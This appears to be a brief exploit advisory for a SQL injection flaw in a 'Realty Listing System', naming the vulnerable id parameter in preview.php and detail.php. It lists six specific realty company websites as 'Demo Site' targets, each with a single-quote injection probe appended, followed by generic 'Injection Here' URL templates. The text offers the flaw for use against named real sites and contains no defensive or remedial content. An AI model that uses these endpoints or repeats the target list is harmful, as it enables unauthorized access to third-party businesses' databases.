Realty Listing System sql Injection Vulnerability


Exploit In File

preview.php?id=
detail.php?id=

Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27

exploit
http://target/%5Bpath%5D/preview.php?id=1

0r
http://target/%5Bpath%5D/detail.php?id=1

Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here